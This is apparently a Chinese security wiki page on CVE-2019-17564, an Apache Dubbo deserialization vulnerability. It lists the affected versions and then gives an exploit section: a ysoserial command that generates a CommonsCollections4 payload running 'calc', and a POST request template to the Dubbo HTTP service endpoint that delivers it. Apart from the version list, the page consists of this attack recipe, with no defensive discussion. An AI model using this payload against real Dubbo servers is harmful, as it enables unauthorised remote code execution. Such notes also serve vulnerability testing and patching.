menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right Apache chevron_right CVE-2019-17564 Apache-Dubbo反序列化漏洞
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2019-17564 Apache-Dubbo反序列化漏洞

    影响版本:

    • 2.7.0 <= Apache Dubbo <= 2.7.4
    • 2.6.0 <= Apache Dubbo <= 2.6.7
    • 2.5.x

    exp:

    Payload生成:java -jar ysoserial.jar CommonsCollections4 "calc"

POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host:yourip:8080

Payload

    @admin-神风